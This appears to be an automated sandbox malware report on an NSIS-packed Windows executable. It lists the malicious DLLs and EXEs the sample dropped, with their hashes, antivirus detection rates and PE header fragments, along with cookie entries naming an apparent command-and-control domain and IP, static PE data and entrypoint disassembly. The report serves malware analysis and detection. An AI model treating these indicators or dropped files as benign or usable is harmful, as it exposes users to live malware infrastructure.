C:\Users\user\AppData\Local\Temp\Gozekeneka.dll

Download File

Process:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.3074171093110873
Encrypted:	false
SSDEEP:	48:CXqWBMk6A7qZ2LcYKEbcqNCCC81iBtYf86SyuUH5npNpRppv5D:Cqv2cOCCC81Aw8hyBnNvv
MD5:	7AC02E7E2C7EC30BFC8C946D12DF26A0
SHA1:	079FF9DBFC5AF1D4DC569203847F50A8B30B5056
SHA-256:	71CFBE0622AEA1248EFF7CA09095493B3D47DF40E0936493B098D770551213F3
SHA-512:	DAC09E5CA0BDA7A9094A34F17B6606767B4A1E308148BFC1AC7E1C0AA55404C4AA50366C8F5F9BC2D225BE88D9290CCB7F55AECF71CB400528538367A2E2CA3F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 77% Antivirus: Virustotal, Detection: 75%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IMr..,...,...,...0...,...3...,...,...,..o3...,...3...,......,...3...,..Rich.,..........................PE..L.....GQ...........!......................... ...............................`....................................... ..J... ..<....@..X....................P..d.................................................... .. ............................text...B........................... ..`.rdata...... ......................@..@.data...x....0......................@....rsrc...X....@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.7221735995832015
Encrypted:	false
SSDEEP:	48:CXqWBMkLSPowUXULXfCmY6ULcYKEbc2VsTgt0fJdkp9uUH5nr3dppfO9:CqN7UXULXffY6EcSMJdkrBV3F29
MD5:	213FF346767B1B7C2AF9EC4EF51A7267
SHA1:	66D9FE22F0403E52EFFCCE675DEB8D674C11AF5D
SHA-256:	F227C46CCD589B9F48F066F0901DFF6A772B332E725BA0030A273B5B5A8BC41C
SHA-512:	B91E4D76F17B9245AE97FD7D7FB44E307C8A2A0C043FD212BAA7C4EEE946729A43CEF72F77344EA52BA6C9934CE01F85F6E839CC00BEB4ABEABDCF4B32644206
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 66%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IMr..,...,...,...0...,...3...,...,...,..o3...,...3...,...*...,...3...,..Rich.,..........................PE..L....xGQ...........!................O........ ...............................`....................................... ..K... ..<....@..`....................P..\|.................................................... .. ............................text............................... ..`.rdata..+.... ......................@..@.data........0......................@....rsrc...`....@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19968
Entropy (8bit):	4.009299462345418
Encrypted:	false
SSDEEP:	96:kinIPI95bH6bfG6rg0cbqiJrlUoynNmwIvc0NFSH:XnD5bGVrlHiJrlUoynNmwIvN4
MD5:	44902781C1865978B17F396DB51D85E1
SHA1:	D1EBC2238FCA1CFFCABBD692E9AF4D3121396983
SHA-256:	667FFD6F177DD67F4928DDE38378C5E500984CE40ED73BB6F1B3EE997B513403
SHA-512:	D60828174B1D042A4541FD26D4AF2DEABD44BB862C416B31BE28DE0B133FC9E2569389CDD0185B70819080B5AF0F54CFC72F7B96808CEE7FFB7C4C7E3E764774
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 76% Antivirus: Virustotal, Detection: 77%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.v.#.%.#.%.#.%.?.%.#.%N?.%.#.%%<.%.#.%%<.%.#.%.<.%.#.%.#.%.#.%%<.%.#.%u%.%.#.%Rich.#.%................PE..L....xGQ.....................@............... ....@.......................................................................... .......@..H7........................................................................... ...............................text...0........................... ..`.rdata..t.... ......................@..@.data........0......................@....rsrc...H7...@...8..................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe

Download File

Process:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	88209
Entropy (8bit):	7.192271927525946
Encrypted:	false
SSDEEP:	1536:cpgpHzb9dZVX9fHMvG0D3XJz0MAuV9wWGm1FJaThXPF5zRRn55NATTeIIQ:qgXdZt9P6D3XJYMHV9wWGkEZ7Fx55NCr
MD5:	B3657BCFE8240BC0985093A0F8682703
SHA1:	4E19F1CC04645356FD523E67655E5D76A19A86BA
SHA-256:	5F4B0AA22CE65B30FB232421673FAD4C126970928207ADE256D3BFEE33DC3687
SHA-512:	71C06203020C5C5BCB1C9F8383544BF270C5D7FAC1E732FEC1F78820BBF91A6DB5888FF57D782A05D49A960351B5436966C78974C60B40908099603118C56B15
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87% Antivirus: Virustotal, Detection: 85%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......p..X?...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc...X?...p...@...z..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Sahofivizu.exe

Download File

Process:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.1878975851833986
Encrypted:	false
SSDEEP:	192:1AFmqdxP1oynRg94DELe9vZ/wJcVuhWEx:yFL1Q9eR6hTx
MD5:	7FE00CC4EA8429629AC0AC610DB51993
SHA1:	5B2B4BF75EF99D03D3EA3A778E0BD0B124C5E70B
SHA-256:	9827E20FFED86C23DD493845F03A9041977C5CF0E5DA14EDFEB7EDADFAA34508
SHA-512:	F1E919C53E6829447F03AAFEDFC0128CEC4F03C21CC127A26C9CB336D42DEBF94703C9939976EE9B74F629C6713CB571F178D500503BE88E8A2D770AA2843BF5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 57% Antivirus: Virustotal, Detection: 61%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v..%..%..%T..%..%?..%..%?..%..%...%..%..%..%?..%..%o.%..%Rich..%................PE..L.....GQ.....................V......6........ ....@.......................................................................... .......P...;........................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc....;...P...<..................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Yumicebivud.rih

Download File

Process:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	7.980181192486164
Encrypted:	false
SSDEEP:	1536:gVbB3S+6LC/SQd6sTGmGEWx+JWgxhfCvWYjo/pk2X+FMCZTtkUn4rEeaMj31e5+P:KhTSQ0omUyD2X8htksIae31fX9cnheF7
MD5:	0F12B3226FE28398608E4F48B3FAFCA2
SHA1:	38B5BFD50DF9775C8ED379A0FA5F43979411E252
SHA-256:	7637E855C4F59DDFE01C9857FBDFF59036177BC1B439B4B0A24E14BC2E3E509A
SHA-512:	089DBFF0BFB72F3925E67055D45D357602D999AFAF7E82238AF18A2D3C86C9B1C37672C049E14939B3E414B11875DD70EF31F72D29B3ADA68D826081B5C347AF
Malicious:	false
Reputation:	low
Preview:	a\JFBTTs[YWQrM82758275827g]ABX]f_G]SS5827582758275827^]@YPT...\^[58275827582758275kWCaP@RT\qX[LWOA8275827582yAm\ZTHd^PO}Qf]QC\W\75827582pPLf_G]SSvW\CP@F758275827582pPL.XQM^RsQ^R{Y_Rt82758275827gL^mPJ]zPU]EL8275827582758\CQT^.QT^75827582758275.WCeJ]Tt\VEPKA75827582{ZYV{\Z@VGAs758275827582758a_YOSG\.V[Y827582758275827582`GQFReJ]TPKAzPU]EL82758275.WCvW_ZTVV{\VWv58275827eYF_r]FvG_Av582758275827vJWVA]bEZ[WDFy2758275827582758275uh.5;275<275..75.2758275x27582758275827582758275827582758275.2756-.;8.>...6y..c]QA.EJ]PGY_.VY\YZL.UP.@B[.[Y.\|}d.U]SP.?:?.2758275.....O...O...O..7P...O..\S...O..7P...O...O...O..P...O...O...O..7P...O..gI...O..j[T].O..82758275hw75t345..pd82758275.284331582758.658275..758"758"7582w58"758075<2758275<27582758.5586758275:27582'58"7582'58"758275(27582758275<#75.2758.75..658275827582758275827582758275827582758275827582758275827582758275827582758"75.275827582758275827582758275.@STLS75d4758"758:758675827582758275x27u.VVAY275.?758.758<758>75827582758275x27..@DG[275..658.758.658(

C:\Users\user\AppData\Local\Temp\Zojemilocan.dll

Download File

Process:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.9848615810105574
Encrypted:	false
SSDEEP:	24:eFGSWUcWLuSDlkGPfe58//zYVVfiRHtaU4VExxSIVSPAEVlcr7:iWGLvybcMDfXtVe4PAylcr
MD5:	3ED0F4B16841CCF3C6D613E77BCEF3CD
SHA1:	751E4846DB47CCF5F94DB4CA198E96E77A7032E7
SHA-256:	A9B7526FE7C988F2219FA3B726DC2F771DE38C31593C3B8DAD3AC06E60135AC3
SHA-512:	6D44120D28AB5CA8164423C428EDDBF488C605A56F20794BB96618E8539AA50F9A24B9FD48E58001CEB95EC7932DC96BC48CB3F9C732FA0481F76C81F91CFFCB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 64% Antivirus: Virustotal, Detection: 74%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................y................y.....y.....Rich...........PE..L.....GQ...........!................Q........ ...............................P...................................... !..O...$ ..<............................@..L.................................................... ..$............................text............................... ..`.rdata..o.... ......................@..@.data...d....0......................@....reloc..t....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\naseropuxeq.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17408
Entropy (8bit):	6.090813739725965
Encrypted:	false
SSDEEP:	192:ZPtFv5PY4kJlbZxiDZmZBdZDETl/trQXYezGGK5vZgZa+HNgtt1ycHl0WqESzyyE:rgZOZmlGNZJ+ytLdKyyT20dX1o9Fn
MD5:	67A995C0B4C431BE506625F3674DC621
SHA1:	72C43092973661CA8E5225749EA6CD9CFC3423DC
SHA-256:	4BEA02228E8CA0854826D6A3BB0D8DC5E6F2828B344AEF8E2B811D06F8EB67AA
SHA-512:	9F85EF3E51C484C4B13484F04D3ECEA1CDF34ECE7DBB6BEF544DE63BD160FDE60360D76CC2B7509E07F5830FECA1829344597C21135FC5CF231B4FD2E92BA4BD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 59% Antivirus: Virustotal, Detection: 71%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Pv.>%.>%.>%1.4%.>%Z.0%.>%..-%.>%.?%..>%1.5%.>%a.8%.>%1.:%.>%Rich.>%........PE..L....xGQ...........!.....,..........I........@.......................................................................G..O....C..(....`..X....................p.......................................................@...............................text....*.......,.................. ..`.rdata.._....@.......0..............@..@.data........P.......8..............@....rsrc...X....`.......:..............@..@.reloc.......p.......>..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\natigezeholi.dll

Download File

Process:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17408
Entropy (8bit):	6.081723116162573
Encrypted:	false
SSDEEP:	192:MwPLlx5c4kJlbOxPDAE/mZBdZDEql+frQXYezGGK5vJgZa+HNgt/GI/x0mqESzyj:nsORXml/gDJuyt/RqyyuFX4o947Q
MD5:	F0C82EE96B56BF20D2B1CE93F7C0F941
SHA1:	432B3E4B9A1362D267630655DD44FEE58C49A2F0
SHA-256:	E6E1FA7A937C3CFA383C7A5CC5D1723E551A8AF62A03C7D8AF46504384D7993D
SHA-512:	0A342A87300C8BE6E1558A2729418A286F2770AE51960083289B25055659F27B3CC8870636660ECA67CC0C0A88D4E416B48B8ABFA0B709D434A953D6E59220D2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 78% Antivirus: Virustotal, Detection: 76%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Xv.6%.6%.6%1.<%.6%Z.8%.6%..%%.6%.7%..6%1.=%.6%a.0%.6%1.2%.6%Rich.6%........................PE..L.....GQ...........!.....,..........N........@.......................................................................F..O....C..(....`..`....................p.......................................................@...............................text....*.......,.................. ..`.rdata..?....@.......0..............@..@.data........P.......8..............@....rsrc...`....`.......:..............@..@.reloc.......p.......>..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\rikayolehofu.Xoc

Download File

Process:	C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	7.710087680990932
Encrypted:	false
SSDEEP:	384:1vPMrqX9DPfgkbWXqJNkNOYBNduseKKtCzkIPxOHPKRcadXpemop3gOrpNZ47vgJ:1vPeGDPfY6N8OYBNiwkIZcWcIpeXgqBJ
MD5:	45C8066C7A91E80794989C5BB03279CD
SHA1:	C16572FC6A2B7E5D2A5912CF175C9CDD7E4DDA78
SHA-256:	494A2F8CEB59B0A73B2CAE75A8016F1B5EED0355899A8FE27DE3ECF4856C89AC
SHA-512:	90136A41568E730749A954BD43D0EDBFE2BCFF53D67E16CF651830E1C028A5C866E0B462C88E67BDC627C8B016B56BDDC4794FF5BCF1F621A274A6007A244B6A
Malicious:	false
Reputation:	low
Preview:	qFSQAWdD_VWGEq52460524eUAf\DUTVwY^AWLB0524605246`TF\qUAsFQCt2460524605\@R\Y.PZ\5246052460524`YGFAW\t^XYSpJ46052460524605uQBd]@QWTv]ZBUMF4605246052_SB[WX...VXZ0524605246052460rW@u_X_UXTy[ZSq5246052460524qUAbFYStVPDUFA4605246052cDYAWdD_VWGE}P_[DI52460{FaX]TBb_UB}ReUVF]Y^52460524dDYhQD_xWYYBL24605246052g^\BSD_.Q^X605246052460524605`QEEXW`^BPSP60524605246\|ZSPzYW@UDIt24605246052460rW@{_QGXSv\^QxQXWu60524605246052460xh.635242052..05.4605246p52460524605246052460524605246052460.246>*.:6.<...1y..bX\A.FBZUFW].QUX^ZF.TU.@AX.\\.r.f.YYTP.9;:.2460524.,...K...I...O..?W...M..PW...I..:P...H...M...K..V...O...H...M..;T...I..jI...H..dYVZ.K..24605246`p24z162...d24605246.5=5=13246052h605246..246 524&0524v05"46072420524605646052460.2464524605046052$60%2460%24&052460%246052460520'05.4605.46.q246052460524605246052460524605246052460524605246052460524605246052460524605"46.524605246052460524605246052.DTTFU60i4460%2468524205246052460524v05r.RQAS460.?460.246>524:05246052460524v05..DCGQ460.v460.246v524,052460524605

C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll

Download File

Process:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.080260047634796
Encrypted:	false
SSDEEP:	24:ev1GSqYDIuQyKxsq1X//oRVCR7tqU4xbaVZGy1Uua0wlqF4JNeS4G8Xq5S493Q00:qq4IBvsW/uTtx2OySuF30lN3T74
MD5:	81F429115E1AFD4A95DA0A8A73E4ACD1
SHA1:	520F4618A20E20E2ACC2382AF16CA244FE42B97E
SHA-256:	29D1AC834EDB48C1A75C90CF896EF27A53366BFECDEE7D65DDBB6621DC540200
SHA-512:	350994DB9C153E5CE2DD62D3C759378E0CD091F8FBD67E6D555FF34266C4BB5097FB376DC007D89EEDF939DA05BDBFFE00EF2A9A8EA2C0048C309702D1163619
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 67% Antivirus: Virustotal, Detection: 67%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1.k.1.k.1.k..a.5.k.1.j.=.k..`.3.k...m.0.k..o.5.k.Rich1.k.................PE..L.....GQ...........!................Q........ ...............................`.......................................!..M..., ..(....@.......................P..P.................................................... ..,............................text............................... ..`.rdata..M.... ......................@..@.data...X....0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yiduyevutog.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	2.9251612114551473
Encrypted:	false
SSDEEP:	24:ev1GSsGN+gg438JKANCE/mh7Vj3RotYU4sZfHtV1VdODXyIua0wJlRh1N7oRRC85:qsGtg43q3pgptgfHtA9uFmt/CCan+7
MD5:	E397A32C7C3ACA65A2A94D923F407B52
SHA1:	93C91BB1E8FDA9ECEC5A999BE0662A4E633D767F
SHA-256:	46B5B07EF3ADA0792C594D7FAAFF667DECF81E968908FADCD2F6020EACF400CD
SHA-512:	7BA018E72E51B78178E15A7BF940782815570D6D9A2E76A7C235877C5A447E3B8A91EF15E801D700D4857E0AA73589F526D34A8347D09A04A04F2D0AADE236A7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 73%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......................c....................Rich...........PE..L....xGQ...........!................{........ ...............................`......................................P!..N...4 ..<....@.......................P..P.................................................... ..4............................text............................... ..`.rdata....... ......................@..@.data...`....0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

Download File

Process:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Reputation:	low
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\R3PRUMZY.txt

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	99
Entropy (8bit):	4.623332970722682
Encrypted:	false
SSDEEP:	3:PfmYZLIRSzZfZJWEA1QWQRUvNxdQVeXvWA7dXviVPv:P+ILIR0lWn1QrmvN3A+Ngv
MD5:	CCF36D8632B95ACA87A55794AD9A3AF8
SHA1:	16586E00683427DC7C1090EDA5D575B103DDF8F1
SHA-256:	4A4EE293DAB048952EEC9CCDCECF457646FC7B4135CFAE76CB6ABD3C83E6C431
SHA-512:	5C3245D6B5110057BA3790184C3F26BC8F243F70456ED13A553521BCE2BAD7E4B46FE23631FD5CF6E04AF9B9660D5CAB7D0CCBC649A5B393F6B0E0368F66A2B8
Malicious:	false
Reputation:	low
Preview:	snkz.89.187.171.144.pe.suckmycocklameavindustry.in/.1536.1178451968.31320892.3507856880.31061020.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y4A6H5R0.txt

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	157
Entropy (8bit):	4.591261443677953
Encrypted:	false
SSDEEP:	3:EngSc3dxZElO3dcYZLIRqTcTUJVecQVgVvXGOfZJWEA1QWQ7XiodQVeXvWA7dXvq:Egv3dxZEMcILIRqQYJ5QGFXZ/Wn1QrTs
MD5:	3931E58FFFBD0D2CF50ECFB0B0E77ACD
SHA1:	8D38511F7BA590D1F5F6482F83A6CB78F28065C5
SHA-256:	D5923F9CD92811609C2E5F53CB20FFC639A7480B4D5ECBC032A5826F5853DCF5
SHA-512:	EEB6205CA92955C3706215DB8942B2A3C3554BB7D3D6F171C4BDB2A944597609A2A5F7E3EB33E6CF5FA1DC1F155C3AC18CEC22419454AF9568CDD19DAB7D1179
Malicious:	false
Reputation:	low
Preview:	btst.8894309f7f6b8698b45deaaa26bda18e\|89.187.171.144\|1696132900\|1696132900\|0\|1\|0.suckmycocklameavindustry.in/.9728.1178451968.31320892.3507856880.31061020.*.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.67760121359675
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Hu25VEa8Dr.exe
File size:	196'227 bytes
MD5:	bc76bd7b332aa8f6aedbb8e11b7ba9b6
SHA1:	c6858031315a50ec87e37966291ec69b64600efb
SHA256:	9535a9bb1ae8f620d7cbd7d9f5c20336b0fd2c78d1a7d892d76e4652dd8b2be7
SHA512:	c74a8a893d0d91ef9423c75c14e701102f01d46b4638d7e3184c95bfd4ff29f9cab71fe5de45e8e201dcdb8df77e952a18e32bfed5014b9c8155c189825f37e9
SSDEEP:	3072:ugXdZt9P6D3XJ3TCM/vosUE2L/TLqtAyD2XXhtksIae31fXJHhKgzyJtdeV:ue34p/vr6yrC2sJe35ZBKg0dW
TLSH:	6B14024364F582BFD6820432D5B92B79D77BCD8D438A7A470B447F21BA318D3C909E8A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^.........

File Icon


Icon Hash:	9270c4ccc6741c42

Static PE Info

General

Entrypoint:	0x4030fa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B1AE3CC [Sat Dec 5 22:50:52 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7fa974366048f9c551ef45714595665e

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409160h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B0h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [0042EC18h], eax
call 00007FEEC5176316h
mov dword ptr [0042EB64h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 00428F98h
call dword ptr [00407158h]
push 00409154h
push 0042E360h
call 00007FEEC5175FC9h
call dword ptr [004070ACh]
mov edi, 00434000h
push eax
push edi
call 00007FEEC5175FB7h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00434000h], 00000022h
mov dword ptr [0042EB60h], eax
mov eax, edi
jne 00007FEEC517372Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00434001h
push dword ptr [esp+14h]
push eax
call 00007FEEC5175AAAh
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007FEEC5173785h
cmp cl, 00000020h
jne 00007FEEC5173728h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FEEC517371Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74b0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x43f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c4c	0x5e00	False	0.6697140957446809	data	6.440105549497952	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x129c	0x1400	False	0.43359375	data	5.046835307909969	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25c58	0x400	False	0.5849609375	data	4.801003752715384	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2f000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x37000	0x43f8	0x4400	False	0.16670496323529413	data	2.6375067972964095	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x37238	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.09076763485477178
RT_ICON	0x397e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.14118198874296436
RT_ICON	0x3a888	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3891843971631206
RT_DIALOG	0x3acf0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3adf0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3af10	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3af70	0x30	data	English	United States	0.8541666666666666
RT_VERSION	0x3afa0	0x184	MS Windows COFF Alpha object file	English	United States	0.5463917525773195
RT_MANIFEST	0x3b128	0x2cc	XML 1.0 document, ASCII text, with very long lines (716), with no line terminators	English	United States	0.5656424581005587

Imports

DLL	Import
